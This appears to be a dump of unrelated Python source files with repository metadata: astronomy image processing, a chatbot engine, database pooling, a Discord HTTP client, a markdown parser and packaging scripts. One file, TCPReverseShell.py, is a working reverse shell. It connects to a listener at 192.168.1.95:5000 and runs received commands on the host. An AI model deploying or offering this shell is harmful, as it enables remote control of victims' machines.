self.wcs = CoordinateSystem.from_file(wcs_path)
# Loop over the different images and set the WCS
for datacube_name in self.images:
for filter_name in self.images[datacube_name]:
# Debugging
log.debug("Setting the coordinate system of the " + filter_name + " image of the '" + datacube_name + "' instrument ...")
# Set the coordinate system for this frame
self.images[datacube_name][filter_name].wcs = self.wcs
# -----------------------------------------------------------------
def convolve(self, kernel_paths, host_id=None):
"""
This function ...
:param kernel_paths:
:param host_id:
:return:
"""
# Inform the user
log.info("Convolving the images ...")
# If the convolutions must be performed remotely
if host_id is not None:
# Loop over the images
for datacube_name in self.images:
for filter_name in self.images[datacube_name]:
# Check if the name of the image filter is a key in the 'kernel_paths' dictionary. If not, don't convolve.
if filter_name not in kernel_paths or kernel_paths[filter_name] is None: continue
# Determine the kernel path for this image
kernel_path = kernel_paths[filter_name]
# Perform the remote convolution
self.images[datacube_name][filter_name] = remote_convolution_frame(self.images[datacube_name][filter_name], kernel_path, host_id)
# The convolution is performed locally
else:
# Loop over the images
for datacube_name in self.images:
for filter_name in self.images[datacube_name]:
# Check if the name of the image filter is a key in the 'kernel_paths' dictionary. If not, don't convolve.
if filter_name not in kernel_paths or kernel_paths[filter_name] is None: continue
# Load the kernel
kernel = Frame.from_file(kernel_paths[filter_name])
# Debugging
log.debug("Convolving the '" + filter_name + "' image of the '" + datacube_name + "' instrument ...")
# Convolve this image frame
self.images[datacube_name][filter_name].convolve(kernel)
# -----------------------------------------------------------------
def convert_units(self, unit):
"""
This function ...
:param self:
:param unit:
:return:
"""
# TODO: right now, this is just an implementation of the conversion from W / (m2 * arcsec2 * micron) to MJy/sr
# 1 Jy = 1e-26 * W / (m2 * Hz)
# Inform the user
log.info("Converting the units of the images to " + str(unit) + " ...")
# Get the pixelscale
#pixelscale = self.wcs.average_pixelscale.to("arcsec/pix").value # in arcsec**2 / pixel
# Loop over the images
for datacube_name in self.images:
for filter_name in self.images[datacube_name]:
# Debugging
log.debug("Converting the unit of the " + filter_name + " image of the '" + datacube_name + "' instrument ...")
# Get the pivot wavelength of the filter
fltr = self.filters[filter_name]
pivot = fltr.pivotwavelength() * Unit("micron")
# Determine the conversion factor
conversion_factor = 1.0
# From surface brightness to flux density (no)
#conversion_factor *=
# From W / (m2 * arcsec2 * micron) to W / (m2 * arcsec2 * Hz)
conversion_factor *= (pivot ** 2 / speed_of_light).to("micron/Hz").value
# From W / (m2 * arcsec2 * Hz) to MJy / sr
#conversion_factor *= (Unit("W/(m2 * arcsec2 * Hz)") / Unit("MJy/sr")).to("")
conversion_factor *= 1e26 * 1e-6 * (Unit("sr") / Unit("arcsec2")).to("")
# Convert
self.images[datacube_name][filter_name] *= conversion_factor
self.images[datacube_name][filter_name].unit = "MJy/sr"
# -----------------------------------------------------------------
def write(self, output_path):
"""
This function ...
:param output_path:
:return:
"""
# Inform the user
log.info("Writing the images ...")
# Loop over the different images (self.images is a nested dictionary of dictionaries)
for datacube_name in self.images:
for filter_name in self.images[datacube_name]:
# Determine the path to the output FITS file
path = fs.join(output_path, datacube_name + "__" + filter_name + ".fits")
# Save the image
self.images[datacube_name][filter_name].save(path)
# -----------------------------------------------------------------
def instrument_name(datacube_path, prefix):
"""
This function ...
:param datacube_path:
:param prefix:
:return:
"""
return fs.name(datacube_path).split("_total.fits")[0].split(prefix + "_")[1]
# -----------------------------------------------------------------
| 35.134804
| 209
| 0.548936
| 1,585
| 14,335
| 4.849211
| 0.181073
| 0.042935
| 0.030445
| 0.037211
| 0.269321
| 0.228858
| 0.161202
| 0.139735
| 0.130887
| 0.115405
| 0
| 0.005864
| 0.31001
| 14,335
| 407
| 210
| 35.22113
| 0.771105
| 0.387792
| 0
| 0.157895
| 0
| 0
| 0.100957
| 0
| 0
| 0
| 0
| 0.004914
| 0
| 1
| 0.078947
| false
| 0
| 0.087719
| 0
| 0.184211
| 0.008772
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60c1d48ace52455ffd7fc2885603c6dc3baa53ba
| 5,876
|
py
|
Python
|
venv/Lib/site-packages/rivescript/inheritance.py
|
Hazemcodes/GimmyBot
|
f24cb90e0d3c045100f59def1d5e14bef367cba7
|
[
"Apache-2.0"
] | 154
|
2015-02-04T08:41:23.000Z
|
2022-03-18T19:39:53.000Z
|
venv/Lib/site-packages/rivescript/inheritance.py
|
Hazemcodes/GimmyBot
|
f24cb90e0d3c045100f59def1d5e14bef367cba7
|
[
"Apache-2.0"
] | 115
|
2015-06-14T13:31:07.000Z
|
2022-02-14T23:02:19.000Z
|
venv/Lib/site-packages/rivescript/inheritance.py
|
Hazemcodes/GimmyBot
|
f24cb90e0d3c045100f59def1d5e14bef367cba7
|
[
"Apache-2.0"
] | 87
|
2015-04-18T23:15:18.000Z
|
2022-03-18T09:52:06.000Z
|
# RiveScript-Python
#
# This code is released under the MIT License.
# See the "LICENSE" file for more information.
#
# https://www.rivescript.com/
def get_topic_triggers(rs, topic, thats, depth=0, inheritance=0, inherited=False):
"""Recursively scan a topic and return a list of all triggers.
Arguments:
rs (RiveScript): A reference to the parent RiveScript instance.
topic (str): The original topic name.
thats (bool): Are we getting triggers for 'previous' replies?
depth (int): Recursion step counter.
inheritance (int): The inheritance level counter, for topics that
inherit other topics.
inherited (bool): Whether the current topic is inherited by others.
Returns:
[]str: List of all triggers found.
"""
# Break if we're in too deep.
if depth > rs._depth:
rs._warn("Deep recursion while scanning topic inheritance")
# Keep in mind here that there is a difference between 'includes' and
# 'inherits' -- topics that inherit other topics are able to OVERRIDE
# triggers that appear in the inherited topic. This means that if the top
# topic has a trigger of simply '*', then NO triggers are capable of
# matching in ANY inherited topic, because even though * has the lowest
# priority, it has an automatic priority over all inherited topics.
#
# The getTopicTriggers method takes this into account. All topics that
# inherit other topics will have their triggers prefixed with a fictional
# {inherits} tag, which would start at {inherits=0} and increment if this
# topic has other inheriting topics. So we can use this tag to make sure
# topics that inherit things will have their triggers always be on top of
# the stack, from inherits=0 to inherits=n.
# Important info about the depth vs inheritance params to this function:
# depth increments by 1 each time this function recursively calls itrs.
# inheritance increments by 1 only when this topic inherits another
# topic.
#
# This way, '> topic alpha includes beta inherits gamma' will have this
# effect:
# alpha and beta's triggers are combined together into one matching
# pool, and then those triggers have higher matching priority than
# gamma's.
#
# The inherited option is True if this is a recursive call, from a topic
# that inherits other topics. This forces the {inherits} tag to be added
# to the triggers. This only applies when the top topic 'includes'
# another topic.
rs._say("\tCollecting trigger list for topic " + topic + "(depth="
+ str(depth) + "; inheritance=" + str(inheritance) + "; "
+ "inherited=" + str(inherited) + ")")
# topic: the name of the topic
# depth: starts at 0 and ++'s with each recursion
# Topic doesn't exist?
if not topic in rs._topics:
rs._warn("Inherited or included topic {} doesn't exist or has no triggers".format(
topic
))
return []
# Collect an array of triggers to return.
triggers = []
# Get those that exist in this topic directly.
inThisTopic = []
if not thats:
# The non-that structure is {topic}->[array of triggers]
if topic in rs._topics:
for trigger in rs._topics[topic]:
inThisTopic.append([ trigger["trigger"], trigger ])
else:
# The 'that' structure is: {topic}->{cur trig}->{prev trig}->{trig info}
if topic in rs._thats.keys():
for curtrig in rs._thats[topic].keys():
for previous, pointer in rs._thats[topic][curtrig].items():
inThisTopic.append([ pointer["trigger"], pointer ])
# Does this topic include others?
if topic in rs._includes:
# Check every included topic.
for includes in rs._includes[topic]:
rs._say("\t\tTopic " + topic + " includes " + includes)
triggers.extend(get_topic_triggers(rs, includes, thats, (depth + 1), inheritance, True))
# Does this topic inherit others?
if topic in rs._lineage:
# Check every inherited topic.
for inherits in rs._lineage[topic]:
rs._say("\t\tTopic " + topic + " inherits " + inherits)
triggers.extend(get_topic_triggers(rs, inherits, thats, (depth + 1), (inheritance + 1), False))
# Collect the triggers for *this* topic. If this topic inherits any
# other topics, it means that this topic's triggers have higher
# priority than those in any inherited topics. Enforce this with an
# {inherits} tag.
if topic in rs._lineage or inherited:
for trigger in inThisTopic:
rs._say("\t\tPrefixing trigger with {inherits=" + str(inheritance) + "}" + trigger[0])
triggers.append(["{inherits=" + str(inheritance) + "}" + trigger[0], trigger[1]])
else:
triggers.extend(inThisTopic)
return triggers
def get_topic_tree(rs, topic, depth=0):
"""Given one topic, get the list of all included/inherited topics.
:param str topic: The topic to start the search at.
:param int depth: The recursion depth counter.
:return []str: Array of topics.
"""
# Break if we're in too deep.
if depth > rs._depth:
rs._warn("Deep recursion while scanning topic trees!")
return []
# Collect an array of all topics.
topics = [topic]
# Does this topic include others?
if topic in rs._includes:
# Try each of these.
for includes in sorted(rs._includes[topic]):
topics.extend(get_topic_tree(rs, includes, depth + 1))
# Does this topic inherit others?
if topic in rs._lineage:
# Try each of these.
for inherits in sorted(rs._lineage[topic]):
topics.extend(get_topic_tree(rs, inherits, depth + 1))
return topics
| 40.524138
| 107
| 0.651293
| 790
| 5,876
| 4.798734
| 0.268354
| 0.013717
| 0.018992
| 0.020311
| 0.192561
| 0.129254
| 0.100765
| 0.08441
| 0.08441
| 0.08441
| 0
| 0.003679
| 0.259871
| 5,876
| 144
| 108
| 40.805556
| 0.868016
| 0.534888
| 0
| 0.204082
| 0
| 0
| 0.12476
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.040816
| false
| 0
| 0
| 0
| 0.122449
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60c2063c53b34bc28b910dfe0bb280da49581724
| 2,560
|
py
|
Python
|
src/dataAccess/Connection.py
|
mattmillr/utaka
|
6622e9057c323b0aed1113f8723404d264a7c82e
|
[
"Apache-2.0"
] | 1
|
2016-10-24T02:45:11.000Z
|
2016-10-24T02:45:11.000Z
|
src/dataAccess/Connection.py
|
mattmillr/utaka
|
6622e9057c323b0aed1113f8723404d264a7c82e
|
[
"Apache-2.0"
] | null | null | null |
src/dataAccess/Connection.py
|
mattmillr/utaka
|
6622e9057c323b0aed1113f8723404d264a7c82e
|
[
"Apache-2.0"
] | null | null | null |
#Copyright 2009 Humanitarian International Services Group
#
#Licensed under the Apache License, Version 2.0 (the "License");
#you may not use this file except in compliance with the License.
#You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#Unless required by applicable law or agreed to in writing, software
#distributed under the License is distributed on an "AS IS" BASIS,
#WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#See the License for the specific language governing permissions and
#limitations under the License.
'''
Created Aug 4, 2009
connection pool abstraction over previous Connection.py which is now SingleConnection.py
sets up module scope connection pool, currently with no size limit
pool for both connections with dictionary cursors and regular cursors
reconnects to db every x hours depending on config file
@author: Andrew
'''
from utaka.src.dataAccess.SingleConnection import Connection as SingleConnection
import utaka.src.Config as Config
import MySQLdb
import datetime
dcp = [SingleConnection(True)]
rcp = [SingleConnection(False)]
dbTimer = datetime.datetime.today()
dbTimeout = datetime.timedelta(hours = int(Config.get('database', 'connection_timeout_in_hours')))
class Connection:
def __init__(self, useDictCursor = False):
if len(dcp) > 0:
if useDictCursor:
self.innerConn = dcp.pop()
else:
self.innerConn = rcp.pop()
now = datetime.datetime.today()
if (now - dbTimeout) > self.innerConn.connectTime:
self.innerConn.close()
self.innerConn = SingleConnection(useDictCursor)
else:
self.innerConn = SingleConnection(useDictCursor)
def usingDictCursor(self):
return self.innerConn.usingDictCursor()
def executeStatement(self, statement, placeholder):
return self.innerConn.executeStatement(statement, placeholder)
def getRowCount(self):
return self.innerConn.rowcount()
def commit(self):
self.innerConn.commit()
def rollback(self):
self.innerConn.rollback()
def close(self):
self.commit()
self.__close_()
def cancelAndClose(self):
self.rollback()
self.__close_()
def __close_(self):
utakaLog = open('/var/www/html/utaka/utakaLog', 'a')
try:
if self.usingDictCursor():
utakaLog.write('Dictionary Database Connection Returned to Pool\r\n')
else:
utakaLog.write('Regular Database Connection Returned to Pool\r\n')
finally:
utakaLog.close()
if self.usingDictCursor():
dcp.append(self.innerConn)
else:
rcp.append(self.innerConn)
self.innerConn = None
| 29.767442
| 98
| 0.75625
| 331
| 2,560
| 5.800604
| 0.459215
| 0.094792
| 0.029688
| 0.016667
| 0.035417
| 0.035417
| 0.035417
| 0
| 0
| 0
| 0
| 0.006428
| 0.149219
| 2,560
| 85
| 99
| 30.117647
| 0.875115
| 0.349609
| 0
| 0.196078
| 0
| 0
| 0.098668
| 0.033293
| 0
| 0
| 0
| 0
| 0
| 1
| 0.176471
| false
| 0
| 0.078431
| 0.058824
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60c55601d180bba88cdc945fcda09ef1976ad00b
| 1,617
|
py
|
Python
|
setup.py
|
DKorytkin/pylint-pytest
|
097b7767e5f33ad512d421bea9ebb74a251f47bd
|
[
"MIT"
] | null | null | null |
setup.py
|
DKorytkin/pylint-pytest
|
097b7767e5f33ad512d421bea9ebb74a251f47bd
|
[
"MIT"
] | null | null | null |
setup.py
|
DKorytkin/pylint-pytest
|
097b7767e5f33ad512d421bea9ebb74a251f47bd
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from os import path
from setuptools import setup, find_packages
here = path.abspath(path.dirname(__file__))
with open(path.join(here, 'README.md')) as fin:
long_description = fin.read()
setup(
name='pylint-pytest',
version='1.0.3',
author='Reverb Chu',
author_email='pylint-pytest@reverbc.tw',
maintainer='Reverb Chu',
maintainer_email='pylint-pytest@reverbc.tw',
license='MIT',
url='https://github.com/reverbc/pylint-pytest',
description='A Pylint plugin to suppress pytest-related false positives.',
long_description=long_description,
long_description_content_type='text/markdown',
packages=find_packages(exclude=['tests', 'sandbox']),
install_requires=[
'pylint',
'pytest>=4.6',
],
python_requires='>=3.6',
classifiers=[
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'Topic :: Software Development :: Testing',
'Topic :: Software Development :: Quality Assurance',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: 3.9',
'Programming Language :: Python :: Implementation :: CPython',
'Operating System :: OS Independent',
'License :: OSI Approved :: MIT License',
],
tests_require=['pytest', 'pylint'],
keywords=['pylint', 'pytest', 'plugin'],
)
| 33
| 78
| 0.63389
| 174
| 1,617
| 5.793103
| 0.54023
| 0.131944
| 0.173611
| 0.128968
| 0.051587
| 0
| 0
| 0
| 0
| 0
| 0
| 0.014151
| 0.213358
| 1,617
| 48
| 79
| 33.6875
| 0.778302
| 0.025974
| 0
| 0.04878
| 0
| 0
| 0.497139
| 0.030515
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.04878
| 0
| 0.04878
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60c5712ca1f4ef817490766e027dfd8c59267d52
| 1,637
|
py
|
Python
|
Shells/Python/Client/TCPReverseShell.py
|
lismore/OffensiveCyberTools
|
c43fb78f0067498e53cfa5aad9e0fd60ebd6e069
|
[
"MIT"
] | 1
|
2021-05-18T04:35:38.000Z
|
2021-05-18T04:35:38.000Z
|
Shells/Python/Client/TCPReverseShell.py
|
lismore/OffensiveCyberTools
|
c43fb78f0067498e53cfa5aad9e0fd60ebd6e069
|
[
"MIT"
] | null | null | null |
Shells/Python/Client/TCPReverseShell.py
|
lismore/OffensiveCyberTools
|
c43fb78f0067498e53cfa5aad9e0fd60ebd6e069
|
[
"MIT"
] | 1
|
2021-05-18T04:35:40.000Z
|
2021-05-18T04:35:40.000Z
|
# Reverse TCP Shell in Python For Offensive Security/Penetration Testing Assignments
# Connect on LinkedIn https://www.linkedin.com/in/lismore or Twitter @patricklismore
#=========================================================================================================================================
# Python TCP Client
import socket
import subprocess
#Start client function
def startClient():
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # create the socket object 'sock'
sock.connect(('192.168.1.95', 5000)) # Replace the IP and listening port to your attack machine
while True: # start an infinite loop
sentCommand = sock.recv(1024) # read the 1st KB of the tcp socket
if 'terminate' in sentCommand: # if we get a termiante string from the attack machine then we will close the socket, end the loop
sock.close()
break
else: # or else, the sent command gets sent to the victim shell process
CMD = subprocess.Popen(sentCommand, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
sock.send( CMD.stdout.read() ) # return shell result
sock.send( CMD.stderr.read() ) # return any shell errors
#Main function
def main ():
startClient()
#Program entry point
main()
| 43.078947
| 166
| 0.508247
| 164
| 1,637
| 5.060976
| 0.585366
| 0.050602
| 0.026506
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.016886
| 0.348809
| 1,637
| 37
| 167
| 44.243243
| 0.761726
| 0.444105
| 0
| 0
| 0
| 0
| 0.02349
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.117647
| false
| 0
| 0.117647
| 0
| 0.235294
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60c720ca02631a4c8efcc9abc342c50fb241f153
| 1,324
|
py
|
Python
|
tests/products/test_products.py
|
AlexandruScrob/fast_api_proj_2
|
9aca5d48ab3e42933747b23ff04c6d4f3487d93e
|
[
"MIT"
] | null | null | null |
tests/products/test_products.py
|
AlexandruScrob/fast_api_proj_2
|
9aca5d48ab3e42933747b23ff04c6d4f3487d93e
|
[
"MIT"
] | null | null | null |
tests/products/test_products.py
|
AlexandruScrob/fast_api_proj_2
|
9aca5d48ab3e42933747b23ff04c6d4f3487d93e
|
[
"MIT"
] | null | null | null |
import pytest
from httpx import AsyncClient
from conf_test_db import app
from tests.shared.info import category_info, product_info
@pytest.mark.asyncio
async def test_new_product():
async with AsyncClient(app=app, base_url="http://test") as ac:
category_obj = await category_info()
payload = {
"name": "Quaker Oats",
"quantity": 4,
"description": "Quaker: Good Quality Oats",
"price": 10,
"category_id": category_obj.id,
}
response = await ac.post("/products/", json=payload)
assert response.status_code == 201
json_response = response.json()
assert json_response["name"] == "Quaker Oats"
assert json_response["quantity"] == 4
assert json_response["description"] == "Quaker: Good Quality Oats"
assert json_response["price"] == 10
@pytest.mark.asyncio
async def test_list_products():
async with AsyncClient(app=app, base_url="http://test") as ac:
category_obj = await category_info()
await product_info(category_obj)
response = await ac.get("/products/")
assert response.status_code == 200
assert "name" in response.json()[0]
assert "quantity" in response.json()[0]
assert "description" in response.json()[0]
assert "price" in response.json()[0]
| 29.422222
| 70
| 0.654834
| 166
| 1,324
| 5.072289
| 0.313253
| 0.071259
| 0.085511
| 0.071259
| 0.393112
| 0.24228
| 0.173397
| 0.173397
| 0.173397
| 0.173397
| 0
| 0.015595
| 0.225076
| 1,324
| 44
| 71
| 30.090909
| 0.805068
| 0
| 0
| 0.181818
| 0
| 0
| 0.157855
| 0
| 0
| 0
| 0
| 0
| 0.30303
| 1
| 0
| false
| 0
| 0.121212
| 0
| 0.121212
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60c89c536a5a429da0bac1d845d414b2ea221030
| 4,251
|
py
|
Python
|
restcord/http.py
|
Yandawl/restcord.py
|
eeaf75f4a3d05f3837906a60d5f4a9395c4933ff
|
[
"MIT"
] | 4
|
2020-07-14T19:45:44.000Z
|
2021-08-11T20:15:51.000Z
|
restcord/http.py
|
Yandawl/restcord.py
|
eeaf75f4a3d05f3837906a60d5f4a9395c4933ff
|
[
"MIT"
] | 1
|
2020-07-26T03:06:09.000Z
|
2020-07-26T03:06:09.000Z
|
restcord/http.py
|
Yandawl/restcord.py
|
eeaf75f4a3d05f3837906a60d5f4a9395c4933ff
|
[
"MIT"
] | 1
|
2021-05-28T07:23:40.000Z
|
2021-05-28T07:23:40.000Z
|
# -*- coding: utf-8 -*-
import asyncio
import datetime
import json
import logging
import sys
from typing import Optional
import aiohttp
from aiohttp import ClientSession
from . import __version__
from .errors import (
BadGateway,
BadRequest,
Forbidden,
HTTPException,
InternalServerError,
NotFound,
RateLimited
)
__log__ = logging.getLogger(__name__)
__all__ = (
'Route',
'HTTPClient'
)
class Route:
BASE = 'https://discord.com/api'
def __init__(self, method, path):
self.path = path
self.method = method
self.url = (self.BASE + self.path)
class HTTPClient:
__slots__ = ('token', 'loop', 'proxy', 'proxy_auth', '__session', '__agent')
def __init__(self, token: str, loop=None, proxy=None, proxy_auth=None, session: Optional[ClientSession] = None) -> None:
self.token = token
self.loop = asyncio.get_event_loop() if loop is None else loop
self.proxy = proxy
self.proxy_auth = proxy_auth
self.__session = session
self.__agent = f'RestCord.py (https://github.com/Yandawl/restcord.py {__version__}) Python/{sys.version_info[0]}.{sys.version_info[1]} aiohttp/{aiohttp.__version__}'
async def __aenter__(self):
return self
async def __aexit__(self, exc_type, exc, tb):
await self.close()
@property
def session(self) -> ClientSession:
""":class:`ClientSession`: The aiohttp ClientSession."""
if self.__session is None or self.__session.closed:
self.__session = ClientSession()
return self.__session
async def close(self):
if self.__session:
await self.__session.close()
async def _request(self, route: Route, **kwargs):
method = route.method
url = route.url
kwargs['headers'] = {
'User-Agent': self.__agent,
'X-Ratelimit-Precision': 'millisecond',
'Authorization': f'Bot {self.token}'
}
if 'json' in kwargs:
kwargs['headers']['Content-Type'] = 'application/json'
kwargs['data'] = self.__to_json(kwargs.pop('json'))
if self.proxy is not None:
kwargs['proxy'] = self.proxy
if self.proxy_auth is not None:
kwargs['proxy_auth'] = self.proxy_auth
async with self.session.request(method, url, **kwargs) as r:
__log__.debug(f'{method} {url} with {kwargs.get("data")} has returned {r.status}')
data = await self.__get_data(r)
remaining = r.headers.get('X-Ratelimit-Remaining')
if remaining == '0' and r.status != 429:
__log__.debug(f'A rate limit bucket has been exhausted (retry: {self.__parse_ratelimit_header(r)}).')
if 300 > r.status >= 200:
__log__.debug(f'{method} {url} has received {data}')
return data
if r.status == 429:
raise RateLimited(r, data)
if r.status == 400:
raise BadRequest(r, data)
if r.status == 403:
raise Forbidden(r, data)
if r.status == 404:
raise NotFound(r, data)
if r.status == 500:
raise InternalServerError(r, data)
if r.status == 502:
raise BadGateway(r, data)
raise HTTPException(r, data)
async def __get_data(self, response):
text = await response.text(encoding='utf-8')
try:
if response.headers['content-type'] == 'application/json':
return json.loads(text)
except KeyError:
pass
return text
def __parse_ratelimit_header(self, request, *, use_clock=False):
reset_after = request.headers.get('X-Ratelimit-Reset-After')
if use_clock or not reset_after:
utc = datetime.timezone.utc
now = datetime.datetime.now(utc)
reset = datetime.datetime.fromtimestamp(float(request.headers['X-Ratelimit-Reset']), utc)
return (reset - now).total_seconds()
else:
return float(reset_after)
def __to_json(self, obj):
return json.dumps(obj, separators=(',', ':'), ensure_ascii=True)
| 29.317241
| 173
| 0.593037
| 490
| 4,251
| 4.904082
| 0.302041
| 0.026217
| 0.017478
| 0.032459
| 0.088223
| 0
| 0
| 0
| 0
| 0
| 0
| 0.0106
| 0.289814
| 4,251
| 144
| 174
| 29.520833
| 0.785359
| 0.017172
| 0
| 0
| 0
| 0.018868
| 0.154123
| 0.043145
| 0
| 0
| 0
| 0
| 0
| 1
| 0.04717
| false
| 0.009434
| 0.09434
| 0.009434
| 0.254717
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60ca8c56131d2ab13002b353ba23eeec4638f221
| 2,613
|
py
|
Python
|
mechanical_markdown/parsers.py
|
greenie-msft/mechanical-markdown
|
4fb410a34038fab7d270383561726dd4da7a2aca
|
[
"MIT"
] | null | null | null |
mechanical_markdown/parsers.py
|
greenie-msft/mechanical-markdown
|
4fb410a34038fab7d270383561726dd4da7a2aca
|
[
"MIT"
] | null | null | null |
mechanical_markdown/parsers.py
|
greenie-msft/mechanical-markdown
|
4fb410a34038fab7d270383561726dd4da7a2aca
|
[
"MIT"
] | null | null | null |
"""
Copyright (c) Microsoft Corporation.
Licensed under the MIT License.
"""
import re
import yaml
from html.parser import HTMLParser
from mistune import Renderer
from mechanical_markdown.step import Step
start_token = 'STEP'
end_token = 'END_STEP'
ignore_links_token = 'IGNORE_LINKS'
end_ignore_links_token = 'END_IGNORE'
class MarkdownAnnotationError(Exception):
pass
class HTMLCommentParser(HTMLParser):
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.comment_text = ""
def handle_comment(self, comment):
self.comment_text += comment
class RecipeParser(Renderer):
def __init__(self, shell, **kwargs):
super().__init__(**kwargs)
self.current_step = None
self.all_steps = []
self.external_links = []
self.ignore_links = False
self.shell = shell
def block_code(self, text, lang):
if (lang is not None and lang.strip() in ('bash', 'sh', 'shell-script', 'shell')
and self.current_step is not None):
self.current_step.add_command_block(text)
return ""
def block_html(self, text):
comment_parser = HTMLCommentParser()
comment_parser.feed(text)
comment_body = comment_parser.comment_text
if comment_body.find(end_token) >= 0:
if self.current_step is None:
raise MarkdownAnnotationError("Unexpected <!-- {} --> found".format(end_token))
self.all_steps.append(self.current_step)
self.current_step = None
return ""
elif comment_body.find(ignore_links_token) >= 0:
if self.ignore_links:
raise MarkdownAnnotationError(f"Duplicate <!-- {ignore_links_token} --> found")
self.ignore_links = True
elif comment_body.find(end_ignore_links_token) >= 0:
if not self.ignore_links:
raise MarkdownAnnotationError("Unexpected <!-- {} --> found".format(end_ignore_links_token))
self.ignore_links = False
start_pos = comment_body.find(start_token)
if start_pos < 0:
return ""
if self.current_step is not None:
raise MarkdownAnnotationError(f"<!-- {start_token} --> found while still processing previous step")
start_pos += len(start_token)
self.current_step = Step(yaml.safe_load(comment_body[start_pos:]), self.shell)
return ""
def link(self, link, text=None, title=None):
if re.match("https?://", link) is not None:
self.external_links.append((link, self.ignore_links))
| 30.034483
| 111
| 0.64026
| 309
| 2,613
| 5.148867
| 0.281553
| 0.089881
| 0.075424
| 0.035827
| 0.200503
| 0.095537
| 0
| 0
| 0
| 0
| 0
| 0.002049
| 0.252966
| 2,613
| 86
| 112
| 30.383721
| 0.813012
| 0.026024
| 0
| 0.169492
| 0
| 0
| 0.091483
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.101695
| false
| 0.016949
| 0.084746
| 0
| 0.305085
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60cb62275d3608a9262e293a2d9784988739e4b8
| 7,082
|
py
|
Python
|
cchecker.py
|
jakepolatty/compliance-checker
|
89d362c0616df0267a6a14227fdb9a05daada28e
|
[
"Apache-2.0"
] | null | null | null |
cchecker.py
|
jakepolatty/compliance-checker
|
89d362c0616df0267a6a14227fdb9a05daada28e
|
[
"Apache-2.0"
] | null | null | null |
cchecker.py
|
jakepolatty/compliance-checker
|
89d362c0616df0267a6a14227fdb9a05daada28e
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
from __future__ import print_function
import argparse
import sys
from compliance_checker.runner import ComplianceChecker, CheckSuite
from compliance_checker.cf.util import download_cf_standard_name_table
from compliance_checker import __version__
def main():
# Load all available checker classes
check_suite = CheckSuite()
check_suite.load_all_available_checkers()
parser = argparse.ArgumentParser()
parser.add_argument('--test', '-t', '--test=', '-t=', default=[],
action='append',
help=("Select the Checks you want to perform. Defaults to 'acdd'"
" if unspecified. Versions of standards can be specified via "
"`-t <test_standard>:<version>`. If `<version>` is omitted, or "
"is \"latest\", the latest version of the test standard is used."))
parser.add_argument('--criteria', '-c',
help=("Define the criteria for the checks. "
"Either Strict, Normal, or Lenient. Defaults to Normal."),
nargs='?', default='normal',
choices=['lenient', 'normal', 'strict'])
parser.add_argument('--verbose', '-v',
help="Increase output. May be specified up to three times.",
action="count",
default=0)
parser.add_argument('--skip-checks', '-s',
help="Specifies tests to skip",
action='append')
parser.add_argument('-f', '--format', default=[], action='append',
help=("Output format(s). Options are 'text', 'html', 'json', 'json_new'."
" The difference between the 'json' and the 'json_new'"
